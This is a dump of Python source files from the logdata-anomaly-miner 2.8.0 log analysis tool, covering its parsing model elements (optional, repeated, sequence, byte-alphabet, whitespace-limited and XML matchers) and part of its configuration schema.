logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "repeated_element") and not isinstance(self.repeated_element, ModelElementInterface): msg = "repeated_element has to be of the type ModelElementInterface." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "min_repeat"): if not isinstance(self.min_repeat, int) or isinstance(self.min_repeat, bool): msg = "min_repeat has to be of the type integer." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if self.min_repeat < 0: msg = "min_repeat has to be >= 0." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "max_repeat"): if not isinstance(self.max_repeat, int) or isinstance(self.max_repeat, bool): msg = "max_repeat has to be of the type integer." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if self.max_repeat < 1 or self.min_repeat > self.max_repeat: msg = "max_repeat has to be >= 1 and max_repeat has to be bigger than min_repeat." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "alphabet"): if not isinstance(self.alphabet, bytes): msg = "alphabet has to be of the type bytes." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(self.alphabet) < 1: msg = "alphabet must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "strict_mode") and not isinstance(self.strict_mode, bool): msg = "strict_mode has to be of the type bool." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "ignore_null") and not isinstance(self.ignore_null, bool): msg = "ignore_null has to be of the type bool." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "root_element"): if not isinstance(self.root_element, str): msg = "root_element has to be of the type string." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(self.root_element) < 1: msg = "root_element must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "attribute_prefix"): if not isinstance(self.attribute_prefix, str): msg = "attribute_prefix has to be of the type string." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(self.attribute_prefix) < 1: msg = "attribute_prefix must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "optional_attribute_prefix"): if not isinstance(self.optional_attribute_prefix, str): msg = "optional_attribute_prefix has to be of the type string." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(self.optional_attribute_prefix) < 1: msg = "optional_attribute_prefix must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "empty_allowed_prefix"): if not isinstance(self.empty_allowed_prefix, str): msg = "empty_allowed_prefix has to be of the type string." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(self.empty_allowed_prefix) < 1: msg = "empty_allowed_prefix must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "attribute_prefix") and hasattr(self, "optional_attribute_prefix") and\ self.attribute_prefix == self.optional_attribute_prefix: msg = "attribute_prefix must not be the same as optional_attribute_prefix!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "attribute_prefix") and hasattr(self, "empty_allowed_prefix") and\ self.attribute_prefix == self.empty_allowed_prefix: msg = "attribute_prefix must not be the same as empty_allowed_prefix!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "optional_attribute_prefix") and hasattr(self, "empty_allowed_prefix") and\ self.empty_allowed_prefix == self.optional_attribute_prefix: msg = "optional_attribute_prefix must not be the same as empty_allowed_prefix!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "xml_header_expected") and not isinstance(self.xml_header_expected, bool): msg = "xml_header_expected has to be of the type bool." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) @abc.abstractmethod def get_match_element(self, path, match_context): """Try to find a match on given data for this model element and all its children. When a match is found, the matchContext is updated accordingly. @param path the model path to the parent model element invoking this method. @param match_context an instance of MatchContext class holding the data context to match against. @return the match_element or None if model did not match. """ OptionalMatchModelElement.py000066400000000000000000000044101500476301700361750ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing"""This module defines a model element that is optional. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ModelElementInterface import ModelElementInterface class OptionalMatchModelElement(ModelElementInterface): """This class defines a model element tries to match against a given model element. If that fails returns a zero length match anyway. """ def __init__(self, element_id: str, optional_element: ModelElementInterface): """Initialize the ModelElement. @param element_id an identifier for the ModelElement which is shown in the path. @param optional_element the element to be optionally matched. """ super().__init__(element_id, optional_element=optional_element) self.empty_match_element = MatchElement(f"None/{self.element_id}", b"", None, None) def get_id(self): """Get the element ID.""" return self.element_id def get_child_elements(self): """Return all optional elements.""" return [self.optional_element] def get_match_element(self, path: str, match_context): """@return the embedded child match or an empty match.""" current_path = f"{path}/{self.element_id}" start_data = match_context.match_data match = self.optional_element.get_match_element(current_path, match_context) if match is None: self.empty_match_element.path = current_path return self.empty_match_element return MatchElement(current_path, start_data[:len(start_data) - len(match_context.match_data)], start_data[:len(start_data) - len(match_context.match_data)], [match]) logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing/ParserMatch.py000066400000000000000000000063601500476301700334360ustar00rootroot00000000000000"""This module defines a matching parser model element. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import logging from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.parsing.MatchElement import MatchElement from collections import deque class ParserMatch: """Objects of this class store information about a complete model match. Unlike the MatchElement, this class also provides fields to store information commonly used when dealing with the match. """ def __init__(self, match_element: MatchElement): """Initialize the match. @param match_element the root MatchElement from the parsing process. """ if not isinstance(match_element, MatchElement): msg = "match_element has to be of the type MatchElement." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.match_element = match_element self.match_dictionary = None def get_match_element(self): """Return the matching element.""" return self.match_element def get_match_dictionary(self): """Return a dictionary of all children matches.""" if self.match_dictionary is not None: return self.match_dictionary stack = deque() stack.append([self.match_element]) result_dict = {} while stack: match_list = stack.pop() counter_dict = {} for test_match in match_list: if test_match.path in counter_dict.keys(): counter_dict[test_match.path] = 0 result_dict[test_match.path] = [] else: counter_dict[test_match.path] = None for test_match in match_list: path = test_match.path if counter_dict[path] is not None: try: pos = next(i for i, x in enumerate(result_dict[test_match.path]) if not isinstance(x, list) and isinstance( test_match.match_object, type(x.match_object)) and test_match.match_object == x.match_object) path += f"/{pos}" except StopIteration: path += "/%d" % counter_dict[path] counter_dict[test_match.path] += 1 result_dict[test_match.path].append(test_match) result_dict[path] = test_match children = test_match.children if children is not None: stack.append(children) self.match_dictionary = result_dict return result_dict def __str__(self): return f'ParserMatch: {self.match_element.annotate_match(" ")}' RepeatedElementDataModelElement.py000066400000000000000000000046561500476301700373040ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing"""This module defines a model element that repeats a number of times. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ModelElementInterface import ModelElementInterface class RepeatedElementDataModelElement(ModelElementInterface): """Objects of this class match on repeats of a given element.""" def __init__(self, element_id: str, repeated_element: ModelElementInterface, min_repeat: int = 1, max_repeat: int = 0x100000): """Initialize the ModelElement. @param element_id an identifier for the ModelElement which is shown in the path. @param repeated_element the MatchElement to be repeated in the data. @param min_repeat the minimum number of repeated matches of the repeated_element. @param max_repeat the maximum number of repeated matches of the repeated_element. """ super().__init__(element_id, repeated_element=repeated_element, min_repeat=min_repeat, max_repeat=max_repeat) def get_match_element(self, path, match_context): """Find a suitable number of repeats.""" current_path = f"{path}/{self.element_id}" start_data = match_context.match_data matches = [] match_count = 0 while match_count != self.max_repeat + 1: child_match = self.repeated_element.get_match_element(f"{current_path}/{match_count}", match_context) if child_match is None: break matches += [child_match] match_count += 1 if match_count < self.min_repeat or match_count > self.max_repeat: match_context.match_data = start_data return None return MatchElement(current_path, start_data[:len(start_data) - len(match_context.match_data)], start_data[:len(start_data) - len(match_context.match_data)], matches) SequenceModelElement.py000066400000000000000000000047001500476301700352050ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing"""This module defines a model element that consists of a sequence of model elements that all have to match. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from typing import List from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ModelElementInterface import ModelElementInterface class SequenceModelElement(ModelElementInterface): """This class defines an element to find matches that comprise matches of all given child model elements.""" def __init__(self, element_id: str, children: List["ModelElementInterface"]): """Initialize the ModelElement. @param element_id an identifier for the ModelElement which is shown in the path. @param children a list of child elements to be iterated through. """ super().__init__(element_id, children=children) def get_match_element(self, path, match_context): """Try to find a match on given data for this model element and all its children. When a match is found, the matchContext is updated accordingly. @param path the model path to the parent model element invoking this method. @param match_context an instance of MatchContext class holding the data context to match against. @return the matchElement or None if model did not match. """ current_path = f"{path}/{self.element_id}" start_data = match_context.match_data matches = [] for child_element in self.children: child_match = child_element.get_match_element(current_path, match_context) if child_match is None: match_context.match_data = start_data return None matches += [child_match] return MatchElement(current_path, start_data[:len(start_data) - len(match_context.match_data)], start_data[:len(start_data) - len(match_context.match_data)], matches) VariableByteDataModelElement.py000066400000000000000000000036121500476301700366010ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing"""This module defines a model element for a variable amount of bytes. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ModelElementInterface import ModelElementInterface class VariableByteDataModelElement(ModelElementInterface): """This class defines a model element that takes any string that only contains characters of a given alphabet.""" def __init__(self, element_id: str, alphabet: bytes): """Initialize the ModelElement. @param element_id an identifier for the ModelElement which is shown in the path. @param alphabet the allowed letters to match data. """ super().__init__(element_id, alphabet=alphabet) def get_match_element(self, path, match_context): """Find the maximum number of bytes matching the given alphabet. @return a match when at least one byte was found within alphabet. """ data = match_context.match_data match_len = 0 for test_byte in data: if test_byte not in self.alphabet: break match_len += 1 if match_len == 0: return None match_data = data[:match_len] match_context.update(match_data) return MatchElement(f"{path}/{self.element_id}", match_data, match_data, None) WhiteSpaceLimitedDataModelElement.py000066400000000000000000000031531500476301700375740ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing"""This module defines a model element that takes any string up to the next white space. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ModelElementInterface import ModelElementInterface class WhiteSpaceLimitedDataModelElement(ModelElementInterface): """This class defines a model element that represents a variable amount of characters delimited by a white space.""" def get_match_element(self, path: str, match_context): """Find the maximum number of bytes before encountering whitespace or end of data. @return a match when at least one byte was found. """ data = match_context.match_data match_len = 0 for test_byte in data: if test_byte in b" \t": break match_len += 1 if match_len == 0: return None match_data = data[:match_len] match_context.update(match_data) return MatchElement(f"{path}/{self.element_id}", match_data, match_data, None) XmlModelElement.py000066400000000000000000000546211500476301700342040ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing"""This module defines a model element that takes any string up to a specific delimiter string. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import warnings import logging import defusedxml.ElementTree as xml from typing import List, Union, Any from aminer.parsing.MatchElement import MatchElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.ModelElementInterface import ModelElementInterface from aminer.AminerConfig import DEBUG_LOG_NAME warnings.filterwarnings("ignore", category=DeprecationWarning) debug_log_prefix = "XmlModelElement: " def decode_xml(xml_string, obj=None, attribute_prefix="+"): """Decode xml data from a string recursively.""" children = [elem.tag for elem in xml_string] if obj is None and len(children) > 0: obj = {} obj[xml_string.tag] = [{children[0]: decode_xml(elem, obj)} for elem in xml_string] return obj if len(children) > 0: res = {} for key, value in xml_string.attrib.items(): res[attribute_prefix + key] = value for elem in xml_string: res[elem.tag] = decode_xml(elem, obj) return res return xml_string.text class XmlModelElement(ModelElementInterface): """Parse single- or multi-lined XML data.""" def __init__(self, element_id: str, key_parser_dict: dict, attribute_prefix: str = "+", optional_attribute_prefix: str = "_", empty_allowed_prefix: str = "?", xml_header_expected: bool = False): """Initialize the XmlModelElement. @param element_id: The ID of the element. @param key_parser_dict: A dictionary of all keys with the according parsers (excluding the root element). If an attribute should be optional, the associated key must start with the optional_attribute_prefix. To allow every child element in a XML document use "key": "ALLOW_ALL". To allow empty elements the key must start with empty_allowed_prefix. @param attribute_prefix: This prefix indicates that the element is an attribute of the previous element. @param optional_attribute_prefix: If some attribute starts with this prefix it will be considered optional. @param empty_allowed_prefix: If an element starts with this prefix, it may be empty. @param xml_header_expected: True if the xml header is expected. """ super().__init__(element_id, key_parser_dict=key_parser_dict, attribute_prefix=attribute_prefix, optional_attribute_prefix=optional_attribute_prefix, empty_allowed_prefix=empty_allowed_prefix, xml_header_expected=xml_header_expected) self.dec_escapes = False self.validate_key_parser_dict(key_parser_dict) def validate_key_parser_dict(self, dictionary: dict): """Validate the key_parser_dict.""" for value in dictionary.values(): if isinstance(value, ModelElementInterface): continue if isinstance(value, list): if len(value) == 0: msg = "lists in key_parser_dict must have at least one entry." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) for v in value: if isinstance(v, dict): self.validate_key_parser_dict(v) elif isinstance(value, dict): self.validate_key_parser_dict(value) elif value != "ALLOW_ALL": msg = "wrong type found in key_parser_dict." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) def is_escaped_unicode(self, text: str): """Check if the text contains only ascii characters.""" if all(ord(c) < 128 for c in text): # is escaped unicode ascii? return True return False def get_full_key(self, key, dictionary): """Find the full key in the dictionary.""" test_key = key.lstrip(self.attribute_prefix) options = [self.attribute_prefix + self.optional_attribute_prefix + test_key, self.optional_attribute_prefix + self.attribute_prefix + test_key, self.attribute_prefix + test_key, self.empty_allowed_prefix + test_key] for option in options: if option in dictionary: return option return key def get_stripped_key(self, key): """Return the key without optional_key_prefix and nullable_key_prefix.""" if key.startswith(self.optional_attribute_prefix): key = key[len(self.optional_attribute_prefix):] if key.startswith(self.attribute_prefix + self.optional_attribute_prefix): key = self.attribute_prefix + key[len(self.attribute_prefix + self.optional_attribute_prefix):] if key.startswith(self.empty_allowed_prefix): key = key[len(self.empty_allowed_prefix):] return key def is_nullable_key(self, key): """Check if the key is nullable.""" return key.startswith(self.empty_allowed_prefix) or ( key.startswith(self.optional_attribute_prefix) and key[len(self.optional_attribute_prefix):].startswith(self.attribute_prefix)) or ( key.startswith(self.attribute_prefix) and key[len(self.attribute_prefix):].startswith(self.optional_attribute_prefix)) def get_match_element(self, path: str, match_context): """Try to parse all the match_context against XML. When a match is found, the match_context is updated accordingly. @param path the model path to the parent model element invoking this method. @param match_context an instance of MatchContext class holding the data context to match against. @return the matchElement or None if model did not match. """ current_path = f"{path}/{self.element_id}" old_match_data = match_context.match_data matches: Union[List[Union[MatchElement, None]]] = [] try: index = 0 # There can be a valid case in which the text contains for example \x2d, \\x2d or \\\\x2d, which basically should be decoded # into the unicode form. while index != -1: index = match_context.match_data.find(rb"\x") if index != -1: try: match_context.match_data = match_context.match_data.decode("unicode-escape").encode() except UnicodeDecodeError: break index = 0 while index != -1: index = match_context.match_data.find(b"\\", index) if index != -1 and len(match_context.match_data) - 1 > index and match_context.match_data[ index + 1] not in b"\\'\"abfnrtv/": match_context.match_data = match_context.match_data[:index] + b"\\" + match_context.match_data[index:] index += 2 elif index != -1: index += 2 xml_string = match_context.match_data xml_match_data = decode_xml(xml.fromstring(xml_string)) if xml_string.startswith(b"", 1)[1] if not isinstance(xml_match_data, dict): return None except xml.ParseError as e: logging.getLogger(debug_log_prefix + DEBUG_LOG_NAME).debug(e) return None self.dec_escapes = True if self.is_escaped_unicode(match_context.match_data.decode()): match_context.match_data = match_context.match_data.decode("unicode-escape").encode() self.dec_escapes = False matches += self.parse_dict(self.key_parser_dict, xml_match_data, current_path, match_context) remove_chars = b' \r\n' match_data = match_context.match_data for c in remove_chars: match_data = match_data.replace(bytes(chr(c), encoding="utf-8"), b"") if None in matches or (match_data != b"" and len(matches) > 0): logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + "get_match_element_main NONE RETURNED\n" + match_context.match_data.decode()) match_context.match_data = old_match_data return None # remove all remaining spaces and brackets. match_context.update(match_context.match_data) if len(matches) == 0: resulting_matches = None else: resulting_matches = matches return MatchElement(current_path, xml_string, xml_match_data, resulting_matches) # type: ignore[arg-type] def parse_dict(self, xml_dict: dict, xml_match_data: dict, current_path: str, match_context): """Parse a dictionary.""" matches: List[Union[MatchElement, None]] = [] if not self.check_keys(xml_dict, xml_match_data, match_context): return [None] for i, key in enumerate(xml_match_data.keys()): split_key = key key = self.get_full_key(key, xml_dict) if key not in xml_dict: index = match_context.match_data.find(key.encode()) match_context.update(match_context.match_data[:index]) logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "RETURN [NONE] 2" + key + str(xml_dict)) return [None] value = xml_dict[key] if isinstance(value, (dict, list)) and (not isinstance(xml_match_data, dict) or split_key not in xml_match_data): logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "RETURN [NONE] 3, Key: " + split_key + ", Value: " + repr(value)) return [None] if isinstance(value, dict): if xml_match_data[split_key] is None and self.is_nullable_key(key): data = b"null" matches.append(MatchElement(f"{current_path}/{key}", data, data, None)) index = match_context.match_data.find(data) if match_context.match_data[index + 4] == 34: # " index += 1 match_context.update(match_context.match_data[:index + len(data)]) return matches matches += self.parse_dict(value, xml_match_data[split_key], f"{current_path}/{split_key}", match_context) if xml_match_data[split_key] == {}: index = match_context.match_data.find(split_key.encode()) match_element = MatchElement( current_path+"/"+key, match_context.match_data[:index], match_context.match_data[:index], None) matches.append(match_element) match_context.update(match_context.match_data[:index]) if len(matches) == 0 or matches[-1] is None: logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "No match found for key " + split_key) return matches elif isinstance(value, list): res = self.parse_array(xml_dict, xml_match_data, key, split_key, current_path, matches, match_context, i) if res is not None: return res else: if key != split_key and split_key not in xml_match_data: logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + f"Optional Key {key} not found in xml_match_data") continue if split_key not in xml_match_data: logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + f"Key {split_key} not found in xml_match_data. RETURN [NONE] 4") return [None] if xml_dict[key] == "ALLOW_ALL": match_context.update(match_context.match_data[:match_context.match_data.find( f"".encode()) + len(f"")]) else: match_element, index, data = self.parse_object(xml_dict, xml_match_data, key, split_key, current_path, match_context) matches.append(match_element) if index == -1 and match_element is None: backslash = b"\\" logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + f"Necessary element did not match! Key: {key}, MatchElement: {match_element}, Data: " f"{data.decode()}, IsFloat {isinstance(xml_match_data[split_key], float)}, Index: {index}, " f"MatchContext: {match_context.match_data.replace(backslash, b'').decode()}") return matches match_context.update(match_context.match_data[:index + len(data) + len(f"")]) missing_keys = [x for x in xml_dict if self.get_stripped_key(x) not in xml_match_data and not ( x.startswith(self.optional_attribute_prefix) or x.startswith(self.attribute_prefix + self.optional_attribute_prefix))] for key in missing_keys: logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "Missing Key: " + key) return [None] return matches def check_keys(self, xml_dict, xml_match_data, match_context): """Check if no keys are missing and if the value types match.""" if xml_match_data is None: return False missing_keys = [x for x in xml_dict if self.get_stripped_key(x) not in xml_match_data and not (x.startswith( self.optional_attribute_prefix) or x.startswith(self.attribute_prefix + self.optional_attribute_prefix))] for key in missing_keys: if (not key.startswith(self.empty_allowed_prefix) or ( key.startswith(self.empty_allowed_prefix) and key[len(self.empty_allowed_prefix):] not in xml_match_data)): index = match_context.match_data.find(key.encode()) match_context.update(match_context.match_data[:index]) logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "RETURN [NONE] 1. Key: " + key) return False for key in xml_dict.keys(): k = self.get_stripped_key(key) if not isinstance(xml_match_data, dict) or (k in xml_match_data and isinstance(xml_match_data[k], list) and not isinstance( xml_dict[key], list)): index = match_context.match_data.find(key.encode()) match_context.update(match_context.match_data[:index]) logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "RETURN [NONE] 5. Key: " + key) return False return True def flatten_list(self, lst: list): """Flatten a list of lists using this method recursively.""" if not isinstance(lst, list): return None res: List[Any] = [] for val in lst: if isinstance(val, list): res += self.flatten_list(val) else: res.append(val) return res def parse_array(self, xml_dict: dict, xml_match_data: dict, key: str, split_key: str, current_path: str, matches: list, match_context, i: int): """Parse an array in a xml object.""" if self.is_nullable_key(key) and xml_match_data[split_key] is None: return None if not isinstance(xml_match_data[split_key], list): logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + "Key " + split_key + " is no array. Data: " + str(xml_match_data[split_key])) return [None] search_string = b"" match_array = self.flatten_list(xml_match_data[split_key]) value = self.flatten_list(xml_dict[key]) for j, data in enumerate(match_array): for k, val in enumerate(value): if isinstance(data, str): enc = "utf-8" if self.is_escaped_unicode(data) and self.dec_escapes: enc = "unicode-escape" data = data.encode(enc) if data is None: data = b"null" elif not isinstance(data, bytes): data = str(data).encode() if isinstance(val, dict): matches += self.parse_dict(val, match_array[j], f"{current_path}/{split_key}", match_context) if matches[-1] is None: if len(value) - 1 == k: logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "No match found for key " + split_key) return matches del matches[-1] continue break else: match_element = val.get_match_element(current_path, MatchContext(data)) if match_element is not None and len(match_element.match_string) != len(data): logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + "MatchElement NONE 1. match_string: " + match_element.match_string.decode() + ", data: " + data.decode()) match_element = None index = match_context.match_data.find(data) if match_element is None: logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "MatchElement NONE 2. Data: " + data.decode()) index = -1 match_context.update(match_context.match_data[:index + len(data)]) if index == -1 and val == "ALLOW_ALL": logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + "ALLOW_ALL (ARRAY-ELEMENT). Data: " + match_context.match_data.decode()) index = match_context.match_data.find(search_string) match_context.update(match_context.match_data[:index]) if match_element is not None or (match_element is None and not key.startswith(self.optional_key_prefix)): matches.append(match_element) if index == -1: if len(value) - 1 == k: return matches del matches[-1] continue if len(matches) == 0: return [None] if matches[-1] is None: if len(value) - 1 == k: logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "RETURN MATCHES 3") return matches del matches[-1] continue if len(xml_match_data.keys()) > i + 1: match_context.update(match_context.match_data[:match_context.match_data.find( list(xml_match_data.keys())[i + 1].encode())]) else: match_context.update(match_context.match_data[:match_context.match_data.find(search_string) + len(search_string)]) return None def parse_object(self, xml_dict, xml_match_data, key, split_key, current_path, match_context): """Parse a literal from the xml object.""" current_path += "/" + key data = xml_match_data[split_key] enc = "utf-8" if isinstance(data, str): if self.is_escaped_unicode(data) and self.dec_escapes: enc = "unicode-escape" data = data.encode(enc) elif isinstance(data, bool): data = str(data).replace("T", "t").replace("F", "f").encode() elif data is None: data = b"null" if self.is_nullable_key(key): start = 0 if "null" in key: start = match_context.match_data.find(data) + 4 index = match_context.match_data.find(data, start) if match_context.match_data[index + 4] == 34: index += 1 return MatchElement(current_path, data, data, None), index, data return None, -1, data elif not isinstance(data, bytes): data = str(data).encode() match_element = xml_dict[key].get_match_element(current_path, MatchContext(data)) if match_element is not None and len(match_element.match_string) != len(data) and ( not isinstance(match_element.match_object, bytes) or len(match_element.match_object) != len(data)): logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + f"Data length not matching! match_string: {len(match_element.match_string)}, data: {len(data)}," f" data: {data.decode()}") match_element = None index = max([match_context.match_data.replace(b"\\", b"").find(split_key.encode()), match_context.match_data.find(split_key.encode()), match_context.match_data.decode().find(split_key)]) index += match_context.match_data[index:].find(split_key.encode()) + len(split_key.encode()) try: index += max([match_context.match_data.replace(b"\\", b"")[index:].find(data), match_context.match_data[index:].find(data), match_context.match_data.decode(enc)[index:].find(data.decode(enc))]) except UnicodeDecodeError: index += max([match_context.match_data.replace(b"\\", b"")[index:].find(data), match_context.match_data[index:].find(data), match_context.match_data.decode()[index:].find(data.decode())]) index += len(match_context.match_data[index:]) - len(match_context.match_data[index:].lstrip(b" \r\t\n")) if match_element is None: index = -1 return match_element, index, data logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/000077500000000000000000000000001500476301700306265ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/BaseSchema.py000066400000000000000000000125141500476301700331760ustar00rootroot00000000000000{ 'LearnMode': { 'required': False, 'type': 'boolean' }, 'AminerUser': { 'required': False, 'type': 'string', 'default': 'aminer', 'empty': False }, 'AminerGroup': { 'required': False, 'type': 'string', 'default': 'aminer', 'empty': False }, 'RemoteControlSocket': { 'required': False, 'type': 'string', 'empty': False }, 'Core.PersistenceDir': { 'required': False, 'type': 'string', 'default': '/var/lib/aminer', 'empty': False }, 'Core.LogDir': { 'required': False, 'type': 'string', 'default': '/var/lib/aminer/log', 'empty': False }, 'Core.PersistencePeriod': { 'required': False, 'type': 'integer', 'default': 600, 'min': 1 }, 'MailAlerting.TargetAddress': { 'required': False, 'type': 'string', 'regex': '(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+.[a-zA-Z0-9-]+$)|^[a-zA-Z0-9]+@localhost$', 'default': 'root@localhost', 'empty': False }, 'MailAlerting.FromAddress': { 'required': False, 'type': 'string', 'regex': '(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+.[a-zA-Z0-9-]+$)|^[a-zA-Z0-9]+@localhost$', 'default': 'root@localhost', 'empty': False }, 'MailAlerting.SubjectPrefix': { 'required': False, 'type': 'string', 'default': 'aminer Alerts:' }, 'MailAlerting.AlertGraceTime': { 'required': False, 'type': 'integer', 'default': 0, 'min': 0 }, 'MailAlerting.EventCollectTime': { 'required': False, 'type': 'integer', 'default': 10, 'min': 0 }, 'MailAlerting.MinAlertGap': { 'required': False, 'type': 'integer', 'default': 600, 'min': 0 }, 'MailAlerting.MaxAlertGap': { 'required': False, 'type': 'integer', 'default': 600, 'min': 0 }, 'MailAlerting.MaxEventsPerMessage': { 'required': False, 'type': 'integer', 'default': 1000, 'min': 0 }, 'LogPrefix': { 'required': False, 'type': 'string', }, 'LogResourceList': { 'required': True, 'type': 'list', 'schema': {'type': ['string', 'dict'], 'regex': '^file://.+|^unix://.+', 'empty': False} }, 'Log.StatisticsPeriod': { 'required': False, 'type': 'integer', 'default': 3600, 'min': 0 }, 'Log.StatisticsLevel': { 'required': False, 'type': 'integer', 'default': 1, 'min': 0, 'max': 2 }, 'Log.DebugLevel': { 'required': False, 'type': 'integer', 'default': 1, 'min': 0, 'max': 2 }, 'Log.RemoteControlLogFile': { 'required': False, 'type': 'string', 'empty': False }, 'Log.StatisticsFile': { 'required': False, 'type': 'string', 'empty': False }, 'Log.DebugFile': { 'required': False, 'type': 'string', 'empty': False }, 'Log.Rotation.MaxBytes': 